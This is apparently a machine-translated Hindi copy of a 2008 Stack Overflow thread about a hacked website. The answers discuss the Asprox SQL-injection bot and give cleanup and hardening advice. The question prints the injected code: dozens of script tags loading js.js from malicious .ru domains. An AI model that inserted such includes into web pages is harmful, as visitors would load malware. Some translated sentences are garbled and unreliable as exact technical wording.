मेरी वेबसाइट हैक हो गई .. मुझे क्या करना चाहिए?

Question

मेरी वेबसाइट हैक हो गई .. मुझे क्या करना चाहिए?

मेरे पिता ने आज मुझे बुलाया और कहा कि लोग अपनी वेबसाइट पर जा रहे थे 168 वायरस अपने कंप्यूटर पर डाउनलोड करने की कोशिश कर रहे थे। वह बिल्कुल तकनीकी नहीं है, और पूरी चीज को WYSIWYG संपादक के साथ बनाया है।

I popped his site open and viewed the source, and there was a line of Javascript includes at the bottom of the source right before the closing HTML tag. They included this file (among many others): http://www.98hs.ru/js.js <-- TURN OFF JAVASCRIPT BEFORE YOU GO TO THAT URL.

तो मैंने अभी इसके लिए टिप्पणी की। यह पता चला कि उसका एफ़टीपी पासवर्ड एक सादा शब्दकोष शब्द छह अक्षरों का लंबा था, इसलिए हमें लगता है कि यह हैक कैसे हुआ। हमने अपना पासवर्ड 8+ अंकों के गैर-शब्द स्ट्रिंग में बदल दिया है (वह एक पासफ्रेज़ के लिए नहीं जायेगा क्योंकि वह एक शिकार-एन-पेक टाइपर है)।

मैंने एक जोइस 98hs.ru पर किया था और पाया कि यह चिली में एक सर्वर से होस्ट किया गया है। वास्तव में इसके साथ एक ई-मेल पता भी जुड़ा हुआ है, लेकिन मुझे गंभीरता से संदेह है कि यह व्यक्ति अपराधी है। शायद कुछ अन्य साइट जो हैक हो गई ...

मुझे नहीं पता कि इस बिंदु पर क्या करना है, हालांकि मैंने पहले कभी इस तरह की चीज़ से निपटाया नहीं है। किसी के पास कोई सुझाव है?

वह webhost4life.com के माध्यम से सादा जेन अन-सुरक्षित एफटीपी का उपयोग कर रहा था। मुझे अपनी साइट पर do sftp का कोई तरीका भी दिखाई नहीं देता है। मैं सोच रहा हूं कि उसका उपयोगकर्ता नाम और पासवर्ड अवरुद्ध हो गया है?

तो, समुदाय को यह अधिक प्रासंगिक बनाने के लिए, अपनी वेबसाइट को हैक करने से बचाने के लिए आपको कौन से कदम उठाने चाहिए / सर्वोत्तम अभ्यासों का पालन करना चाहिए?

रिकॉर्ड के लिए, यहां कोड की रेखा है जो "जादुई रूप से" अपनी फ़ाइल में जोड़ दी गई है (और अपने कंप्यूटर पर उसकी फाइल में नहीं है - मैंने इसे पूरी तरह से सुनिश्चित करने के लिए टिप्पणी की है कि यह कुछ भी नहीं करेगा इस पृष्ठ पर, हालांकि मुझे यकीन है कि जेफ इसके खिलाफ सुरक्षा करेगा):

<!--script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js>

0

जोड़ा 06 अगस्त 2008 पर 02:55 लेखक cmcculloh संपादित 21 दिसंबर 2017 पर 05:07

विचारों: 48

स्रोत

ro fr zh bn

बस fwiw, webhost4life पोर्ट 2222 पर sftp है।

जोड़ा 15 दिसंबर 2014 पर 02:20, लेखक ruffin, स्रोत

8 उत्तर

लेखक Dillie-O · Answer 1 · 1970-01-01T05:00Z

मुझे पता है कि यह खेल में थोड़ा देर हो चुकी है, लेकिन जावास्क्रिप्ट के लिए उल्लिखित यूआरएल का उल्लेख जून में शुरू होने वाले एएसपीआरओक्स बॉट पुनरुत्थान का हिस्सा रहा है (कम से कम उस समय जब हम झंडा लगा रहे थे यह)। इसके बारे में कुछ विवरण नीचे उल्लिखित हैं:

http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx

इसके बारे में बुरा बात यह है कि डेटाबेस में प्रभावी रूप से प्रत्येक वर्चर्स प्रकार फ़ील्ड इस यूआरएल के संदर्भ को थूकने के लिए "संक्रमित" है, जिसमें ब्राउज़र को एक छोटा आइफ्रेम मिलता है जो इसे बॉट में बदल देता है। इसके लिए एक बुनियादी एसक्यूएल फिक्स यहां पाया जा सकता है:

http://aspadvice.com/blogs/programming_shorts/ संग्रह / 2008/06/27 / Asprox-Recovery.aspx

डरावनी चीज यह है कि वायरस सिस्टम को तालिकाओं को संक्रमित करने के लिए सिस्टम टेबल को देखता है और बहुत सी साझा होस्टिंग योजनाएं भी अपने ग्राहकों के लिए डेटाबेस स्थान साझा करती हैं। तो सबसे अधिक संभावना है कि यह आपके पिता की साइट भी संक्रमित नहीं थी, लेकिन किसी और की साइट अपने होस्टिंग क्लस्टर के भीतर थी जिसने कुछ खराब कोड लिखा और एसक्यूएल इंजेक्शन हमले के लिए दरवाजा खोला।

अगर उसने अभी तक ऐसा नहीं किया है, तो मैं अपने मेजबान को एक अजीब ई-मेल भेजूंगा और उन्हें पूरे सिस्टम को ठीक करने के लिए उस SQL कोड का एक लिंक दूंगा। आप अपनी खुद की प्रभावित डेटाबेस टेबल को ठीक कर सकते हैं, लेकिन अधिकतर संभावना है कि संक्रमण करने वाले बॉट फिर से उस छेद के माध्यम से गुजरने जा रहे हैं और पूरी तरह से संक्रमित हो रहे हैं।

उम्मीद है कि यह आपको काम करने के लिए कुछ और जानकारी देता है।

संपादित करें: एक और त्वरित विचार, यदि वह अपनी वेबसाइट बनाने के लिए मेजबान ऑनलाइन डिज़ाइन टूल में से किसी एक का उपयोग कर रहा है, तो वह सारी सामग्री शायद कॉलम में बैठी है और इस तरह से संक्रमित है।

लेखक Mark Harrison · Answer 2 · 1970-01-01T05:00Z

आप उल्लेख करते हैं कि आपके पिताजी एक वेबसाइट प्रकाशन उपकरण का उपयोग कर रहे थे।

यदि प्रकाशन उपकरण अपने कंप्यूटर से सर्वर पर प्रकाशित होता है, तो यह हो सकता है कि उसकी स्थानीय फाइलें साफ़ हों, और उसे सर्वर पर पुन: प्रकाशित करने की आवश्यकता है।

उसे देखना चाहिए कि सादे एफ़टीपी की तुलना में उसके सर्वर पर एक अलग लॉगिन विधि है, हालांकि ... यह बहुत सुरक्षित नहीं है क्योंकि यह इंटरनेट पर स्पष्ट-पाठ के रूप में अपना पासवर्ड भेजता है।

लेखक dragonmantank · Answer 3 · 1970-01-01T05:00Z

जितना संभव हो उतना जानकारी आज़माएं और इकट्ठा करें। देखें कि मेजबान आपको एक लॉग दे सकता है जो आपके खाते में किए गए सभी एफ़टीपी कनेक्शन दिखा रहा है। आप उन लोगों का उपयोग कर सकते हैं यह देखने के लिए कि क्या यह एक एफ़टीपी कनेक्शन भी था जिसका उपयोग परिवर्तन करने और संभवतः आईपी पता प्राप्त करने के लिए किया गया था।

यदि आप वर्डप्रेस, ड्रूपल या किसी अन्य चीज जैसे प्रीपेक किए गए सॉफ़्टवेयर का उपयोग कर रहे हैं, तो आपने अपलोड कोड में भेद्यताएं दी हैं जो इस प्रकार के संशोधन की अनुमति देती हैं। यदि यह कस्टम बनाया गया है, तो किसी भी स्थान को दोबारा जांचें जहां आप उपयोगकर्ताओं को फ़ाइलों को अपलोड करने या मौजूदा फ़ाइलों को संशोधित करने की अनुमति देते हैं।

दूसरी बात साइट के डंप को लेना और अन्य संशोधनों के लिए सब कुछ जांचना होगा। यह सिर्फ एक ही संशोधन हो सकता है, लेकिन अगर वे एफ़टीपी के माध्यम से आते हैं जो जानता है कि वहां और क्या है।

अपनी साइट को किसी ज्ञात अच्छी स्थिति में वापस लाएं और यदि आवश्यक हो, तो नवीनतम संस्करण में अपग्रेड करें।

रिटर्न का स्तर भी आपको ध्यान में रखना है। क्या व्यक्ति को ट्रैक करने की कोशिश करने के लायक नुकसान है या यह ऐसा कुछ है जहां आप बस रहते हैं और सीखते हैं और मजबूत पासवर्ड का उपयोग करते हैं?

लेखक Justin Standard · Answer 4 · 1970-01-01T05:00Z

एक छः शब्द चरित्र पासवर्ड के साथ, वह बलपूर्वक मजबूर हो सकता है। यह उनके एफटीपी को अवरुद्ध होने की तुलना में अधिक संभावना है, लेकिन यह भी हो सकता है।

एक मजबूत पासवर्ड से शुरू करें। (8 वर्ण अभी भी काफी कमजोर हैं)

देखें कि इंटरनेट से यह लिंक सुरक्षा ब्लॉग उपयोगी है या नहीं।

लेखक Kev · Answer 5 · 1970-01-01T05:00Z

क्या साइट सिर्फ सादा स्थिर HTML है? यानी वह खुद को एक अपलोड पेज कोड करने में कामयाब नहीं रहा है जो किसी भी समझौता स्क्रिप्ट / पृष्ठों को अपलोड करने के लिए ड्राइविंग करने की अनुमति देता है?

Webhost4life से क्यों न पूछें यदि उनके पास कोई एफ़टीपी लॉग उपलब्ध है और उन्हें समस्या की रिपोर्ट करें। आप कभी नहीं जानते, वे काफी ग्रहणशील हो सकते हैं और आपके लिए वास्तव में क्या हुआ?

मैं एक साझा होस्टर के लिए काम करता हूं और हम हमेशा इन तरह की रिपोर्टों का स्वागत करते हैं और आमतौर पर हमले के सटीक वेक्टर को इंगित कर सकते हैं और सलाह देते हैं कि ग्राहक कहां गलत हो गया है।

लेखक Hrvoje Hudo · Answer 6 · 1970-01-01T05:00Z

हम स्पष्ट रूप से एक ही लड़के से हैक किया गया था! या बॉट, हमारे मामले में। उन्होंने कुछ पुराने क्लासिक एएसपी साइटों पर यूआरएल में एसक्यूएल इंजेक्शन का इस्तेमाल किया जो अब कोई भी बनाए रखता है। हमने आईपी पर हमला किया और उन्हें आईआईएस में अवरुद्ध कर दिया। अब हमें सभी पुराने एएसपी रिफैक्टर करना होगा। इसलिए, मेरी सलाह है कि आईआईएस लॉग को पहले देखें, यह पता लगाने के लिए कि आपकी साइट के कोड या सर्वर कॉन्फ़िगरेशन में समस्या है या नहीं।

लेखक Joe Phillips · Answer 7 · 1970-01-01T05:00Z

शट डाउन स्क्रिप्ट से बचने के लिए इसे बंद किए बिना वेबसर्वर को अनप्लग करें। डेटा ड्राइव के रूप में किसी अन्य कंप्यूटर के माध्यम से हार्ड डिस्क का विश्लेषण करें और देखें कि क्या आप लॉग फाइलों और उस प्रकृति की चीजों के माध्यम से अपराधी को निर्धारित कर सकते हैं। सत्यापित करें कि कोड सुरक्षित है और फिर इसे बैकअप से पुनर्स्थापित करें।

लेखक The Brawny Man · Answer 8 · 1970-01-01T05:00Z

यह हाल ही में मेरे एक ग्राहक के साथ हुआ जो आईपॉवर पर होस्ट किया गया था। मुझे यकीन नहीं है कि आपका होस्टिंग वातावरण अपाचे आधारित था, लेकिन यदि यह सुनिश्चित किया गया था कि .htaccess फ़ाइलों के लिए दोबारा जांच करना सुनिश्चित किया गया है, जो विशेष रूप से वेबूट और छवि निर्देशिकाओं के अंदर नहीं हैं, क्योंकि वे वहां कुछ नस्ल को इंजेक्ट करते हैं साथ ही (वे लोगों को रीडायरेक्ट कर रहे थे कि वे कहां से आए थे)। यह भी जांचें कि आपने कोड के लिए बनाया है जिसे आपने नहीं लिखा था।